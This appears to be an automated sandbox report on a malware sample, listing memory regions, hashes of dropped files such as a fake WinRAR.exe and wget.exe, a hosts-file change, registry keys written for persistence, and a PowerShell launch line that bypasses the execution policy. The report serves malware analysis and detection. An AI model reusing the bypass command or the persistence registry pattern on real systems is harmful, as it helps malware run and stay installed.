SHA512 e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

memory/4664-56-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/4664-57-0x0000000006890000-0x00000000068A0000-memory.dmp

memory/4664-58-0x0000000006890000-0x00000000068A0000-memory.dmp

memory/4664-75-0x000000007EE30000-0x000000007EE40000-memory.dmp

memory/4664-76-0x00000000090F0000-0x0000000009123000-memory.dmp

memory/4664-77-0x000000006F380000-0x000000006F3CB000-memory.dmp

memory/4664-78-0x00000000090D0000-0x00000000090EE000-memory.dmp

memory/4664-83-0x0000000009140000-0x00000000091E5000-memory.dmp

memory/4664-84-0x0000000006890000-0x00000000068A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\wget.exe

MD5 8c04808e4ba12cb793cf661fbbf6c2a0
SHA1 bdfdb50c5f251628c332042f85e8dd8cf5f650e3
SHA256 a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272
SHA512 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

memory/4664-279-0x00000000093A0000-0x00000000093BA000-memory.dmp

memory/4664-284-0x0000000009390000-0x0000000009398000-memory.dmp

memory/4664-300-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/2476-303-0x0000000000400000-0x00000000008F2000-memory.dmp

memory/3436-304-0x00000000725E0000-0x0000000072CCE000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\winrar.exe

MD5 f59f4f7bea12dd7c8d44f0a717c21c8e
SHA1 17629ccb3bd555b72a4432876145707613100b3e
SHA256 f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4
SHA512 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

C:\Users\Admin\AppData\Roaming\services\01plugins0222.rar

MD5 192ea396deb46406bed716cde8b0fda6
SHA1 b48459b0e4f8d712150c2db39764d3658678f8ac
SHA256 c56f6db940d4802fce1621bd03c3563869acc5ccf2f8fc7ef6a4cc5d17e0c04d
SHA512 359fb7a51a6524e5fab57de6b799082e3c9d0582cf0a01a5535d11c02c09803a59da47c5a1d65d6306631fa31e4eb8a03479aec5c877d7e4157f3c60ebeda6e1

memory/3436-311-0x0000000004AA0000-0x0000000004AB0000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\plugin0222

MD5 17d804b82a9cae6218607478d6213aae
SHA1 f5ff7adb303f6dfe07a86f0dc58ae3d2dd3c3b6f
SHA256 506c268dd0361e0bec3f2da64ba330cb56ea566fa3a1a6360519b9844ec6cddd
SHA512 ce0983032550ea02b685b132ccc29d2263fbdd189a36bbd89bd9af44fdc5ce1c2446b4ea6af67ceb474880386b1a3ada33aea9ac157a029e15b55e49e39067a8

memory/4440-315-0x0000000000EE0000-0x0000000000F68000-memory.dmp

memory/4440-316-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/3436-318-0x0000000004AA0000-0x0000000004AB0000-memory.dmp

memory/4440-319-0x0000000005770000-0x0000000005780000-memory.dmp

memory/1620-320-0x0000000000400000-0x000000000046D000-memory.dmp

memory/4440-324-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/1620-325-0x0000000000400000-0x000000000046D000-memory.dmp

memory/1620-323-0x0000000000400000-0x000000000046D000-memory.dmp

memory/1620-327-0x0000000000400000-0x000000000046D000-memory.dmp

memory/4220-331-0x0000000000400000-0x00000000008F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

MD5 5a7358d53674902c204c6fb1e21c78e4
SHA1 1a19c63d8e832037e6b8a2ac956f5541c4efd500
SHA256 1eaefc76658bbbfd2b00154813221e361d1fc615ce5636061d2e9a9d97c5cddb
SHA512 f5d16f554634239f4149cbd514cf13dc51080e6fb80f94d07a13afd3dfa00d03cd5bde72493be120451f004aececb350ac0bcf70ae762c404da3773a42f0a3dd

C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar

MD5 82a56a666981e9e163a1aba74dc70aa8
SHA1 709e44e71ff38d0771d839b74f270c23daa42f64
SHA256 c59448b470702a689cb0525b76d28d68b2436c4f23cac4ee18a32a7a99801eb6
SHA512 ed02644d9621256b2c0bd43eac5d46f1be3ccf741b3701ff624e0f0913bd6829d818d3006619f90fded694c01940e4fca7b1eac92cd647b87212efd4532ccbe0

C:\Users\Admin\AppData\Roaming\services\2plugin2901

MD5 d4121fa27ad9f3c93d00312846a7a2cc
SHA1 ce84a218b13b9084b4d30f18fcea720e078c4c9c
SHA256 ffba3263bcdd2a3b008113b62dd9853d80d279350e548f50485b75925c9d5079
SHA512 65461ca95eae4d51ee691e5a444e14f2cc18e44089c5137bf9060111c111eaeb31f74ca2b155c41d2e0f1fa3d8d4c8288a68fa47dab4fee9e80a627bd20e2ac8

C:\Users\Admin\AppData\Roaming\services\2plugin2901

MD5 5a5a545484abcfd739e596c1ff8753d5
SHA1 42543fdc4b7620ba21ba5d27fd4ab45a549eb503
SHA256 872b4526efdb11051475cfde82c187adfa80a2496ed9835550c1421a039a203e
SHA512 7a1516dab7c58455fe687cec52c522aa111d0b454d8c7c390417e134a2e1631a9bd68c71f82c92423dce598244c71c67e7576121e7ea4c931421a3458f798374

memory/4036-340-0x00007FF660E30000-0x00007FF6617C5000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\.wget-hsts

MD5 2e7e79b18cce7c94164385b314d90f53
SHA1 a7833fce28106e00572c125bc6ea992b8d150a34
SHA256 2e6f936a73f307d230802c14a6aafa06c8e53dcec51ae032acc50cb58e245570
SHA512 dfa49cfb4d64dfc5d20d153c15c696415eccf5da08a4df48f11eeb10bfc29dd3157875c5eca7e6e620113a9191344907828f9c56d8f6018686064ff8b2935c09

memory/1492-347-0x000001F7C5DC0000-0x000001F7C5DE2000-memory.dmp

memory/1492-348-0x00007FFEE58E0000-0x00007FFEE62CC000-memory.dmp

memory/1492-350-0x000001F7C5E30000-0x000001F7C5E40000-memory.dmp

memory/1492-349-0x000001F7C5E30000-0x000001F7C5E40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1382baf175d45c3403f7876af44f4e5d
SHA1 22ac418cfb7969eb2594103b7b9453ba47d5442f
SHA256 dbd14887459c04a3cfc9794da8ab8e6ccbf6a9ed0762055b15d8e55883308374
SHA512 63c7aa001a6b005f6eb04c8484dc7586bf8f7e975ae9c7e9a460c220ae1ffefbb14531067f61e5a5a51f20d4b967c399782c28d70538a12d7aa7ac72fa444b24

memory/1492-354-0x000001F7C5FC0000-0x000001F7C6036000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA1 75c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA256 91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512 db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

memory/1492-400-0x000001F7C5E20000-0x000001F7C5E2A000-memory.dmp

memory/1492-401-0x00007FF7D73F0000-0x00007FF7D7400000-memory.dmp

memory/1492-459-0x000001F7C5E30000-0x000001F7C5E40000-memory.dmp

memory/1492-483-0x000001F7C5E30000-0x000001F7C5E40000-memory.dmp

memory/1492-493-0x00007FFEE58E0000-0x00007FFEE62CC000-memory.dmp

memory/4036-496-0x00007FF660E30000-0x00007FF6617C5000-memory.dmp

memory/4352-500-0x00007FF790D40000-0x00007FF7916D5000-memory.dmp

memory/3736-503-0x00007FFEE58E0000-0x00007FFEE62CC000-memory.dmp

memory/3736-505-0x0000016D4EE70000-0x0000016D4EE80000-memory.dmp

memory/3736-506-0x0000016D4EE70000-0x0000016D4EE80000-memory.dmp

memory/3736-526-0x00007FF7D75A0000-0x00007FF7D75B0000-memory.dmp

memory/3736-525-0x0000016D4EFD0000-0x0000016D4EFEC000-memory.dmp

memory/3736-532-0x0000016D4F1B0000-0x0000016D4F269000-memory.dmp

memory/3736-621-0x0000016D4EE70000-0x0000016D4EE80000-memory.dmp

memory/3736-624-0x0000016D4EE70000-0x0000016D4EE80000-memory.dmp

memory/164-646-0x0000000000400000-0x00000000008F2000-memory.dmp

memory/3736-658-0x00007FFEE58E0000-0x00007FFEE62CC000-memory.dmp

memory/2928-661-0x0000000140000000-0x000000014000D000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 7575c74a6cb2582fe872ec4e5c34d9ae
SHA1 8616d5c5687df7133cb3320d131ab82a25197ca7
SHA256 5cfc757280526df2130740c4fc1722623bb6a51866af1b4f4fba8acaf2b23064
SHA512 8afc0d7c08397a0efc03b313fd9a4986f29c3415ccd640e582fa60a0d3696539243e8d3859cd1b06aea632646b5eb31ffff5cc73ca3df1ac178f44397607b860

memory/2928-662-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2928-663-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2928-664-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2928-665-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2928-668-0x0000000140000000-0x000000014000D000-memory.dmp

memory/196-669-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-670-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-671-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-672-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-676-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/4352-675-0x00007FF790D40000-0x00007FF7916D5000-memory.dmp

memory/196-679-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-680-0x0000000140000000-0x0000000140AB6000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\WinRAR.exe

MD5 ed8f7b42b7277a00a8f6eb192dc0bd77
SHA1 34ff362e6b95852d84580a3430f84da939671c59
SHA256 4af7ef4064e4543d12f19d0edc2a7966e3f91412dff582333ecc0d8e599e9a30
SHA512 15e66093b010741788c24c4a14c824a5ef92a3de9618e7c9eae002ce90cc6c89ff35228e4b202cb2f538b8fc57688e40eaee07395608f32a291753fc09396c2f

memory/196-682-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-683-0x0000000140000000-0x0000000140AB6000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\03plugins0222.rar

MD5 4a3baa2e2630e287a5c0e804c0564ca0
SHA1 c00ae566d6c2dc3f6e20566955d210a16807e028
SHA256 c039a58e89ffc961c978c61cd8746b95c481251381b62acaec252f26e184e919
SHA512 606e9507f80241b932c4f3d4c8fc0207d3e36557d5b1e2837436dc9d6f5b58e7204b18935a091b8a5eff0ea75ef47d14f045cad2a120e43c07de35019849cd16

memory/196-686-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-684-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-687-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-688-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-689-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-690-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-691-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-692-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-693-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-694-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-695-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-696-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-697-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-698-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-699-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-700-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-701-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-702-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-703-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-704-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-709-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-710-0x00007FFEF2D70000-0x00007FFEF2F4B000-memory.dmp

memory/196-712-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-711-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-713-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-715-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-716-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-717-0x000001D3297E0000-0x000001D329800000-memory.dmp

memory/196-719-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-720-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-718-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-721-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-722-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-724-0x000001D3ABA20000-0x000001D3ABA40000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\3plugin0222

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\services\3plugin0222

MD5 028aef2aedb49bb9148e23b3b7b03d37
SHA1 94efee9913eed144e9c1c9727cf82543f65c0ed9
SHA256 bd3ad16cfba1acfcca16be462fe11c0ad79dda99dac169c160d07cc47b3533c2
SHA512 a02ebba3a92fcd7869b87e71f3d5e6238fc738eada46f67e8320d7fad7119f676158b67f18bd3272eb1caedbf521f260bd59b9f5517fb257b50d1168d708ba57

memory/4632-730-0x00000000002B0000-0x0000000000326000-memory.dmp

memory/4632-731-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/4632-732-0x0000000004C80000-0x0000000004C90000-memory.dmp

memory/4632-737-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/164-738-0x00000000725E0000-0x0000000072CCE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3plugin0222.log

MD5 807cb75397a3a9fc38e9fb5f8566eb2d
SHA1 367e151fab5a5a80e60202d287ae522ea53e2563
SHA256 3e5056b73303b361e6b7b52f5edb2ed1a7e9dc2c762bb91d18046f42bc2ffcf3
SHA512 49efef0401ba0e0dc0b30bdff5d414da5494e4194c6269da2cb40b1ab7dc53e7858d29d2b9982bf3ee60ebc9638b5ed2b5ddcbb536bcc57729e79fc81f59f13d

C:\Users\Admin\AppData\Roaming\services\3plugin0222

MD5 ed890fea49ea376d0464e8f04ee58811
SHA1 f3134c8c4b2549e38362d1372f6f6b5a2372aee0
SHA256 1e328ea5223b16dec5b109c8b412e71d891e12d0de423b72f6b473d858c0b362
SHA512 1b5b83412f8ea62e502129abb3664608fd4688286ff8fc5d7b0eab4cee0c5457793ddd5eebf29978cce20bac86e79351df6480336b6913bdc02a4ebc30e48dc4

memory/164-733-0x0000000000400000-0x0000000000450000-memory.dmp

memory/164-739-0x0000000005240000-0x00000000052D2000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\WGET-H~1

MD5 990d670f7d0d9addc18642f106831b36
SHA1 b3b3f72b362c153a8fa060b6e26c0972682e3582
SHA256 dbd84f95c50bcad3bdd257368e723deee49c428a4434c1a6ffb2852f12611253
SHA512 25bde6d8817126077b27b11042b42424d23ca9168e127812c31f2f7aeda93e9e47c971fd0d4b9e36cbee405f3e4085ae14e362deae76148fe69d9c5bb0f7206a

memory/196-752-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-753-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-756-0x0000000140000000-0x0000000140AB6000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240214-en

Max time kernel

117s

Max time network

131s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x410

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
NL 52.111.243.30:443 tcp
US 8.8.8.8:53 200.201.50.20.in-addr.arpa udp
US 8.8.8.8:53 210.178.17.96.in-addr.arpa udp

Files

memory/3244-4-0x00007FF8B9920000-0x00007FF8BA30C000-memory.dmp

memory/3244-6-0x0000024B42120000-0x0000024B42130000-memory.dmp

memory/3244-5-0x0000024B42120000-0x0000024B42130000-memory.dmp

memory/3244-7-0x0000024B42170000-0x0000024B42192000-memory.dmp

memory/3244-10-0x0000024B5A950000-0x0000024B5A9C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v1hzz0dj.dw2.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3244-31-0x0000024B42120000-0x0000024B42130000-memory.dmp

memory/3244-37-0x00007FF8B9920000-0x00007FF8BA30C000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

116s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"

Signatures

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.rev C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
